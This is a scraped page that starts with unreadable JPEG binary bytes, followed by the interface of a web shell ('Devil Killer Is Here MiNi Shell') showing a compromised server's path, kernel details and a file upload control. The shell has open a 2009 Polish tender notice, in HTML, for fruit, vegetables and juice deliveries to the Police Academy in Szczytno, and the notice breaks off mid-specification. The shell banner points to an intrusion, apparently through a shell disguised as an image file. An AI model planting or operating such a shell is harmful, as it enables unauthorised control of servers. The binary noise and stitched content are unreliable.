JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/4270-N-2009.html

<p class="kh_header"><b>Szczytno: dostawy owoców i warzyw świeżych, mrożonych, konserwowych, 
wyrobów garmażeryjnych oraz soków</b><br>
<b>Numer ogłoszenia: 4270 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wyższa Szkoła Policji , ul. marsz. Józefa Piłsudskiego 111, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 089 6215281, faks 089 6215354.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspol.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy owoców i warzyw świeżych, mrożonych, konserwowych, 
wyrobów garmażeryjnych oraz soków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> dostawy owoców i warzyw świeżych, mrożonych, konserwowych, 
wyrobów garmażeryjnych oraz soków.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.31.00.00-4, 15.33.11.30-7, 15.33.11.00-8, 15.33.11.30-7, 15.33.11.40-0, 15.33.11.00-8, 15.33.11.30-7, 15.31.20.00-8, 15.32.16.00-0, 15.32.00.00-7, 15.32.11.00-5, 15.32.12.00-6, 15.33.11.70-9, 15.33.21.00-5, 15.33.14.00-1, 15.33.15.00-2, 15.33.14.50-6, 15.33.01.53-3, 15.33.24.10-1, 15.33.10.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu:
1) spełnienie warunków z art. 22 ust. 1 ustawy Prawo zamówień publicznych, niepodleganie wykluczeniu z art. 24 ust. 1 i 2 ww. ustawy,
2) prowadzenie działalności gospodarczej - tożsamej z niniejszym zamówieniem - objętej wpisem do właściwego rejestru lub ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej,
3) posiadanie uprawnień do wykonywania działalności, objętej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania uprawnień, 
4) wdrażanie przez wykonawcę systemu HACCP.
 
2. Ocena spełnienia warunków wymaganych od wykonawców, odbędzie się według formuły: spełnia - nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty przez wykonawcę. 

3. Wykonawcy niespełniający powyższych warunków zostaną przez zamawiającego
wykluczeni z niniejszego postępowania lub ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Zamawiający żąda złożenia następujących dokumentów: 
1) oświadczenie o spełnieniu przez Wykonawcę warunków określonych w art.22 ust.1 ustawy Pzp, w tym że nie podlega wykluczeniu z postępowania ma podstawie art.24 ust.1 i 2 ustawy Pzp (według wzoru stanowiącego załącznik nr 3 do SIWZ), 
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert, 
3) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) decyzja właściwego organu Inspekcji Sanitarnej o dopuszczeniu do obrotu produktami spożywczymi, stanowiącymi przedmiot zamówienia, lub decyzja właściwego organu Inspekcji Weterynaryjnej zezwalająca wykonawcy na produkcję artykułów spożywczych, stanowiących przedmiot zamówienia,

5) oświadczenie Wykonawcy o wdrożeniu przez niego systemu HACCP lub certyfikat HACCP w przypadku wdrożonego systemu, 

6) wykaz podwykonawców (na lub w oparciu o załącznik nr 5 do SIWZ),

2.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt. 2 i 3, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.2. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
3. Dokumenty wymienione w ust. 1 pkt. 2, 3, 4 i 5 (tylko w przypadku certyfikatu HACCP) mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem - na każdej stronie dokumentu - przez wykonawcę (osoby uprawnione do składania oświadczeń woli w imieniu wykonawcy).
4. Zamawiający może zażądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu (np. jeśli przedstawione kserokopie będą nieczytelne lub będą wzbudzać wątpliwości co do ich prawdziwości)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80.00</li>
<li>2 - jakość i walory smakowe - 20.00</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wspol.edu.pl/zamowienia/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wyższa Szkoła Policji 12-100 Szczytno, ul. Marszałka Józefa Piłsudskiego 111 blok nr 18 pok. nr 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2009 godzina 10:00, miejsce: Wyższa Szkoła Policji 12-100 Szczytno, ul. Marszałka Józefa Piłsudskiego 111 blok nr 18 pok. nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany, kl.I, PN - ISO 931, CPV: 15300000-1
Dopuszczalne tolerancje :
Barwa od jasnozielonkawej do jasnożółtej
Cechy dyskwalifikujące :
Gnicie, pleśnienie, uszkodzenia od szkodników, zdeformowany kształt, całkowicie zielona barwa skórki, przejrzałe lub zielone, mocne przebarwienia lub plamy na skórce
Opakowania : pudło kartonowe do 25 kg
Pomarańcze, kl.I, CPV: 15300000-1
PN/R - 75514 
Dopuszczalne tolerancje :
lekkie wady kształtu, lekkie wady barwy, lekkie wady rozwojowe skórki jak osrebrzenie, ordzewienie, lekkie zabliźnione uszkodzenia 
Cechy dyskwalifikujące :
Posiadające zmiany mrozowe, uszkodzone. Opakowania : pudło kartonowe lub skrzynka
Cytryna, kl.I ,PN/R - 75514, CPV: 15300000-1 
Dopuszczalne tolerancje :
Lekkie wady kształtu, lekkie wady barwy, lekkie wady rozwojowe skórki jak osrebrzenie, ordzewienie, lekkie zabliźnione uszkodzenia 
Cechy dyskwalifikujące :
Gnicie, uszkodzone, posiadające zmiany mrozowe
Opakowania : pudło kartonowe lub skrzynka
Jabłko asortyment, gat.I, CPV: 15300000-1
Dopuszczalne tolerancje :
lekkie obicia : zagojone uszkodzenia mechaniczne, lekkie wady rozwoju i kształtu oraz barwy, szypułka może być lekko uszkodzona
Cechy dyskwalifikujące :
Gnicie, szkodniki, zamarznięte, porażone miękką oparzeliną chłodniową
Opakowania : skrzynka
Odmiana jednorodna przy każdej dostawie
Gruszki asortyment, gat.I, CPV: 15300000-1
Dopuszczalne tolerancje :
lekkie obicia : zagojone uszkodzenia mechaniczne, lekkie wady rozwoju i kształtu oraz barwy, szypułka może być lekko uszkodzona
Cechy dyskwalifikujące :
Gnicie, szkodniki, zamarznięte, porażone miękką oparzeliną chłodniową
Opakowania : skrzynka
Odmiana jednorodna przy każdej dostawie
Ziemniaki, gat.I, CPV: 15310000-4
Odmiana jednorodna przy każdej dostawie. 
Cechy dyskwalifikujące : zanieczyszczenia środkami ochrony roślin, zaparzenie i zapleśnienie, porośniecie kiełkami powyżej 1 cm, obce zapachy
Groch łuskany, połówki, gat. I, CPV: 15331130-7
Opakowania - worek jutowy min.30 kg 
Wymagania minimalne: bez objawów pleśni i gnicia
Fasola biała, gat. I, CPV: 15331130-7
Opakowania - worek jutowy min.30 kg 
Wymagania minimalne: bez objawów pleśni i gnicia
Fasola Jaś, gat. I, CPV: 15331130-7
Opakowania - worek jutowy min.30 kg 
Wymagania minimalne: bez objawów pleśni i gnicia
Cebula, kl. I,  PN -87/R - 75357, CPV: 15331100-8
Średnica nie mnie niż 4 cm. Przy każdej dostawie odmiana jednorodna. Opakowania : worki raszlowe do 30 kg lub skrzynka do 20 kg. Cechy dyskwalifikujące : zgnicie, zamarznięcie, uszkodzenia przez choroby i szkodniki
Szczypior z cebulą, gat.I, CPV: 15331100-8
PN - R - 75381
Pęczek a 100g - 150g. Wymagania minimalne : świeży, bez objawów pleśni i gnicia lub zaparzenia , bez pędów kwiatostanowych
Por, kl. I , PN - R - 75521, CPV: 15331100-8
Wymagania minimalne : 1/3 długości o barwie białej do zielonkawo-białej. Odmiana jednorodna przy każdej dostawie. Cechy dyskwalifikujące : objawy gnicia, zamarznięte.
Marchew, gat. I, CPV: 15331100-8
PN - 84/R - 75358 
Odmiana jednorodna przy każdej dostawie. Opakowania : worki raszlowe do 30 kg lub skrzynka do 20 kg. Dopuszczalne tolerancje : z zazielenieniem główki powyżej 1 cm do 3 % wagi. 
Cechy dyskwalifikujące : żółte zabarwienie, lekko nadgniłe, zamarznięte, zaparzone, zapleśnione, silne uszkodzenia mechaniczne, zwiędnięcie
Pietruszka, korzeń, kl. I, CPV: 15331100-8
PN - R - 75370 
Odmiana jednorodna przy każdej dostawie. Opakowanie : worek lub skrzynka. Cechy dyskwalifikujące : objawy gnicia, zmarznięta, pęknięcia lub stłuczenia 
Pietruszka, natka, gat. I, pęczek a 50g ,PN - R - 75381, CPV: 15331100-8
Wymagania minimalne : 
świeża, bez pożółkłych i zeschniętych części, bez objawów pleśni i gnicia lub zaparzenia, bez pędów kwiatostanowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.31.00.00-4, 15.33.11.30-7, 15.33.11.00-8, 15.33.11.40-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 05.00</li>
<li>2. Opust liczony od maksymalnych cen giełdowych publikowanych przez Warszawsko Rolno - Spożywczy Rynek Hurtowy S.A. w Broniszach - 95.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Puree ziemniaczane, gat.I, a 25 kg (+ - 10%), CPV: 15312000-8
Skład : płatki ziemniaczane suszone, regulator kwasowości, cytrynian sodu, substancje emulgujące E 471, wzmacniacz smaku i zapachu :glutaminian sodu, substancja konserwująca E 223, przeciwutleniacz E 320, barwnik, ryboflawina, przyprawy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.20.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. jakość i walory smakowe - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sok 1L (karton), gat.I,  ,z plastikowym, odkręcanym otwieraczem, preferowane są soki typu Tymbark lub równoważne , o smaku :
- jabłkowym CPV: 15321600-0
Wymagania klasyfikacyjne:
produkowany z soku owoców - jabłek lub zagęszczonego soku owocowego, zawierający naturalne składniki smakowo - aromatyczne, niegazowany, zdolny do fermentacji lecz niesfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, klarowna, bez osadów i innych zanieczyszczeń, 
smak i zapach - charakterystyczny dla owoców - jabłek, smak świeży, orzeźwiający, Dopuszczalne tolerancje: dopuszcza się opalizację oraz naturalne zmętnienie pochodzące od użytych do produkcji owoców
Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp.,
zanieczyszczenia mechaniczne, objawy psucia,  zafermentowania, pleśnienia, silne zmętnienie, zmiana zabarwienia, uszkodzenia mechaniczne kartonów, brak oznakowania, nieszczelność,
obecność zanieczyszczeń chemicznych i bakterii chorobotwórczych (bombaże kartonów)
- czarnej porzeczki CPV: 15320000-7
Wymagania klasyfikacyjne:
produkowany z soku owoców - czarnej porzeczki lub zagęszczonego soku 
owocowego, zawierający naturalne składniki smakowo - aromatyczne, niegazowany, zdolny do 
fermentacji lecz niesfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, klarowna, bez osadów i innych 
zanieczyszczeń, 
smak i zapach - charakterystyczny dla owoców - czarnej porzeczki, smak świeży, 
orzeźwiający, Dopuszczalne tolerancje: dopuszcza się opalizację oraz naturalne zmętnienie pochodzące od użytych do produkcji owoców Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły, itp.,
zanieczyszczenia mechaniczne,
objawy psucia, zafermentowania, pleśnienia, silne zmętnienie, zmiana zabarwienia, 
uszkodzenia mechaniczne kartonów, brak oznakowania, nieszczelność
- pomarańczowym, CPV: 15321100-5
Wymagania klasyfikacyjne :
produkowany z soku owoców - pomarańczy lub zagęszczonego soku owocowego, zawierający naturalne składniki smakowo - aromatyczne, niegazowany, zdolny do fermentacji lecz niesfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, pomarańczowa, 
smak i zapach - charakterystyczny dla owoców - pomarańczy, smak świeży, orzeźwiający
Dopuszczalne tolerancje:
dopuszcza się opalizację oraz naturalne zmętnienie pochodzące od użytych do produkcji owoców,               Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp.,
zanieczyszczenia mechaniczne,
objawy psucia, zafermentowania, pleśnienia, silne zmętnienie, zmiana zabarwienia,
uszkodzenia mechaniczne kartoników, brak oznakowania, nieszczelność
- grapefruitowym, CPV: 15321200-6
Wymagania klasyfikacyjne :
produkowany z soku owoców -grapefruitów lub zagęszczonego soku owocowego, zawierający naturalne składniki smakowo - aromatyczne, niegazowany, zdolny do fermentacji lecz niesfermentowany otrzymany przez dodanie wody oraz cukrów lub miodu.
konsystencja - płynna, 
barwa - charakterystyczna dla użytych składników, żółta, 
smak i zapach - charakterystyczny dla owoców -grapefruitów, smak świeży, orzeźwiający
Dopuszczalne tolerancje:
dopuszcza się opalizację oraz naturalne zmętnienie pochodzące od użytych do produkcji owoców        Cechy dyskwalifikujące: obce posmaki, zapachy, smak gorzki, mocno kwaśny, stęchły, mdły itp. zanieczyszczenia mechaniczne,
objawy psucia, zafermentowania, pleśnienia, zmiana zabarwienia,
uszkodzenia mechaniczne kartoników, brak oznakowania, nieszczelność
Sok przecierowy, marchwiowo - owocowy, (różne smaki), gat.I, 
CPV: 15321000-4, pasteryzowany, słodzony, wzbogacony witaminami, nie zawierający barwników i konserwantów. Sok typu Kubuś lub równoważny
Opakowanie szklane 0,33L (+ -3%).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.32.16.00-0, 15.32.00.00-7, 15.32.11.00-5, 15.32.12.00-6, 15.32.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone, gat.I, CPV: 15331170-9
Dopuszczalne tolerancje:
- wygląd - różyczki  bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych nie oblodzone , niewielkie oszronienie nie stanowi wady,                         Cechy dyskwalifikujące:
listki przerastające,
różyczki rozluźnione,
różyczki uszkodzone mechanicznie,
różyczki z oparzeliną mrozową,
zlepieńce stałe,
różyczki uszkodzone przez choroby lub szkodniki,
zanieczyszczenia obce,
zanieczyszczenia mineralne
Opakowanie nie mniejsze niż 2500g
Brukselka mrożona, gat.I, CPV: 15331170-9
Wymagania klasyfikacyjne :
brukselka - kapusta, główki obrane z zewnętrznych liści ochronnych i uszkodzonych, całe bez uszkodzeń mechanicznych, zwarte, z przyciętym głąbikiem,wygląd -główki barwy zielonej do zielono kremowej, bez zlepieńców trwałych, nie oblodzone, niewielkie oszronienie nie stanowi wady Dopuszczalne tolerancje:
wielkość od 15 do 32 mm, zawartość główek z ciemnym głąbikiem nie więcej niż - 10 %, 
zawartość główek uszkodzonych mechanicznie nie więcej niż -10%, Cechy dyskwalifikujące:
-listki przerastające,
-główki silnie rozluźnione - rozkwitnięte,
-główki uszkodzone mechanicznie,
-zlepieńce stałe,
-główki uszkodzone przez choroby lub szkodniki, z widocznymi ciemnobrązowymi plamami,
-zanieczyszczenia mineralne, mechaniczne
Opakowanie minimum 2500g
Kalafior mrożony, gat.I, CPV: 15331170-9
Różyczki - części róży kalafiorowej , powstałe przez jej rozdzielenie na mniejsze części, z głąbikami przyciętymi do 20 mm, mierząc od nasady najniższego rozgałęzienia
Dopuszczalne tolerancje:
- wielkość 15 do 35mm
- wygląd - różyczki zwarte, bez przerastających zielonych listków, bez uszkodzeń mechanicznych, bez zlepieńców trwałych nie oblodzone , niewielkie oszronienie nie stanowi wady,           
Cechy dyskwalifikujące:
listki przerastające,
różyczki rozluźnione,
różyczki uszkodzone mechanicznie,
różyczki z oparzeliną mrozową,
zlepieńce stałe,
różyczki uszkodzone przez choroby lub szkodniki,
zanieczyszczenia obce,
zanieczyszczenia mineralne
Opakowanie nie mniejsze niż 2500g
Marchew mrożona kostka, gat.I, CPV: 15331170-9
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego 
zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp.
Opakowania minimum 2500g
Groszek mrożony, gat.I, CPV: 15331170-9
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego 
zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp.
Opakowania minimum 2500g
Fasolka szparagowa żółta, cała, mrożona, gat.I, CPV: 15331170-9
Dopuszczalne tolerancje:
jednolitość odmianowa - praktycznie jednolita odmianowo w partii, dopuszcza się inne odmiany o podobnych parametrach technologicznych i cechach jakościowych, wygląd - strąki całe, kształtne, niepołamane, sypkie, wolne od zlepieńców trwałych, niewielkie oszronienie nie stanowi wady, zawartość strąków uszkodzonych mechanicznie nie więcej niż - 5 %, ze skazami nie więcej niż - 3 %,barwa - intensywna  żółta, nie zbrązowiała, praktycznie jednolita w całej partii, 
Smak i zapach - typowy dla świeżej fasoli, całkowicie wolny od obcego smaku i zapachu
Konsystencja w stanie zamrożonym - twarda, po ugotowaniu - krucha bez mączystych ziaren, niegąbczasta, niewłóknista zanieczyszczenia - strąki czyste, bez zanieczyszczeń roślinnych i mineralnych
Cechy dyskwalifikujące:
strąki uszkodzone mechanicznie, odcinki strąków nacięte, częściowo połamane, strąki niekształtne,
strąki młode, o ziarnach słabo zaznaczonych, niewyrośnięte nie oddzielające się od miąższu strąka,
strąki dojrzewające, z pełni wyrośniętymi ziarnami, niejednolite pod względem przekroju, o rozjaśnionej barwie,
strąki włókniste, zawierające niepożądane łyko, włókno w szwach, albo wyściółkę pergaminową w okrywach,
strąki ze skazami, niejadalny koniec strąka, strąki z oparzeliną mrozową
Opakowanie nie mniejsze niż 2500g
Fasolka szparagowa zielona, cięta, mrożona, gat.I, CPV: 15331170-9
Dopuszczalne tolerancje:
